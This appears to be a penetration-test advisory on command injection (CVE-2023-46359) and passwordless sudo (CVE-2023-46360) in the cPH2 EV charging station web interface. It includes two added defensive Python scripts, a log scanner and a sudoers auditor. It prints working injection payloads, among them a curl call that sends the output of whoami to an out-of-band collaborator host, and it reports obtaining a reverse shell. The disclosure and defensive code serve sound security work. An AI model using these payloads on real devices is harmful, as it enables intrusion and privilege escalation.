During a web application penetration test for one of our clients, we identified an OS Command Injection vulnerability in the cPH2 charging station produced by eCharge Hardy Barth GmbH.

The cPH2 charging station ships with a web interface from which an administrator can monitor and manage real-time usage, charge logs, firmware updates and configuration settings.

Configuration Page

The vulnerable PHP page is not linked from the user interface, but an inspection of the page source revealed the "/connectioncheck.php" endpoint, which takes an IP address as a parameter. Since it was evidently designed to test connectivity to the supplied IP, most likely by running a ping command, this endpoint was a natural candidate for OS Command Injection.

Vulnerable endpoint discovered in the page source of /config.php

Using a straightforward payload such as ip=127.0.0.1 && ${whoami}, the server responds with 127.0.0.1 && ${whoami} => <b>SUCCESS</b>. This indicates that the injected command was executed, but the response clearly does not include the output of that command.

To verify that the payload is executed and to extract data, we tried an out-of-band payload, 127.0.0.1 && curl $(whoami).puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com, and we received DNS and HTTP requests at our Burp Collaborator for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com.

DNS request received for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com.
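As an added example (not code from this write-up or from eCharge Hardy Barth), the following Python shows the two checks a defender would want around an endpoint like /connectioncheck.php: strict validation of the ip parameter before it can reach any shell, and a scan of web-server access logs for requests to that endpoint whose ip value is not an IP literal. The log lines are constructed, and the helper names and the argv-based ping wrapper are assumptions about a hardened design, not the product's actual implementation.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Accept only an IP literal. ipaddress.ip_address() is strict: no whitespace,
# no hostnames, no shell metacharacters, so anything else is rejected early.
def validate_ip(value: str):
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


# Hypothetical hardened form of the connectivity check: the command is built
# as an argument list (never a shell string), so even a valid value is not
# parsed by /bin/sh. It returns argv for subprocess.run(argv) instead of
# executing it, so the logic can be exercised offline.
def build_ping_argv(ip_param: str):
    ip = validate_ip(ip_param)
    if ip is None:
        raise ValueError("ip parameter is not a valid IP address")
    return ["ping", "-c", "1", str(ip)]


# Combined-log-format prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


# Detection: flag every request to /connectioncheck.php whose decoded ip
# parameter would fail the same validation the endpoint should apply.
def find_suspicious_connectioncheck(log_text: str):
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/connectioncheck.php":
            continue
        # parse_qs percent-decodes values, so "+%26%26+" becomes " && ".
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("ip", [""]):
            if validate_ip(raw) is None:
                findings.append({"src": m.group("src"),
                                 "ts": m.group("ts"),
                                 "ip_param": raw})
    return findings


# Constructed sample access log (not from a real device): one benign
# connectivity check, one injection attempt, one unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2023:10:01:02 +0000] "GET /connectioncheck.php?ip=192.0.2.10 HTTP/1.1" 200 45
203.0.113.5 - - [10/Nov/2023:10:01:09 +0000] "GET /connectioncheck.php?ip=127.0.0.1+%26%26+%24%7Bwhoami%7D HTTP/1.1" 200 61
203.0.113.5 - - [10/Nov/2023:10:01:20 +0000] "GET /config.php HTTP/1.1" 200 8120
"""

if __name__ == "__main__":
    print(build_ping_argv("192.0.2.10"))
    for f in find_suspicious_connectioncheck(SAMPLE_LOG):
        print("suspicious connectioncheck request:", f)
```

The log scan only sees parameters that appear in the request line, so if the device logged only the path, or the parameter were sent in a POST body, the same validation would have to run on the application side (or in a reverse proxy) rather than on the access log.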

Having confirmed that the payload executes on the target device, we can deploy a payload that initiates a reverse shell. This OS Command Injection vulnerability has been assigned CVE-2023-46359.

Reverse shell obtained as www-data

As the screenshot above shows, the service runs under the www-data user, and this user turned out to hold privileges it does not need: it can run sudo commands without being prompted for a password. This configuration is a security risk in itself, since anyone who obtains the www-data context can use it to perform unauthorized actions on the system with elevated privileges. This misconfiguration is tracked as CVE-2023-46360.
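The passwordless sudo finding is the kind of misconfiguration that is easy to catch in a fleet-wide audit. As an added example (not code from this write-up or from the vendor), the Python below parses sudoers-style rules and flags NOPASSWD entries that grant ALL commands or that belong to a web-server service account. The sudoers content is constructed, and the list of service-account names is an assumption a deployment would adjust.

```python
import re

# Assumption: accounts under which web servers commonly run; extend per site.
SERVICE_ACCOUNTS = {"www-data", "nobody", "apache", "nginx"}

# user  host = (runas) TAG: TAG: commands   (Defaults lines handled separately)
SUDOERS_RULE = re.compile(
    r"^(?P<who>[^\s#]+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)


# Returns one finding per rule that is both passwordless and overly broad:
# either it grants ALL commands, or it is attached to a service account that
# should never be running sudo at all.
def audit_sudoers(text: str):
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith("Defaults"):
            continue
        m = SUDOERS_RULE.match(stripped)
        if not m:
            continue
        who = m.group("who")
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        cmds = m.group("cmds").strip()
        if "NOPASSWD" not in tags:
            continue
        reasons = []
        if cmds == "ALL":
            reasons.append("passwordless sudo for ALL commands")
        if who in SERVICE_ACCOUNTS:
            reasons.append("sudo granted to service account")
        if reasons:
            findings.append({"line": lineno, "who": who,
                             "cmds": cmds, "reasons": reasons})
    return findings


# Constructed sample sudoers (not the device's real file). Rules 3 and 4
# are the ones an audit should flag; the deploy rule is narrow and
# interactive-user scoped, so it passes.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
nobody  ALL=(root) NOPASSWD: /sbin/reboot
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: {f['who']} -> {f['cmds']}: {', '.join(f['reasons'])}")
```

Running it against /etc/sudoers and /etc/sudoers.d/* exported from each device (visudo -c first, since a syntax error there means sudo is already broken) gives a quick inventory of which units still carry the CVE-2023-46360 configuration.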

A Nuclei template for CVE-2023-46359 is available in the nuclei-templates repository.

Both vulnerabilities affect all cPH2 Charging Station versions earlier than 2.0.0.
Affected customers are advised to update their systems to version 2.0.0 or later.